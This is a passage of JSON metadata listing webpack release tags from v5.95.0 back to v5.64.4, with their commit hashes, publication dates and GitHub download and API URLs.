r.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"ht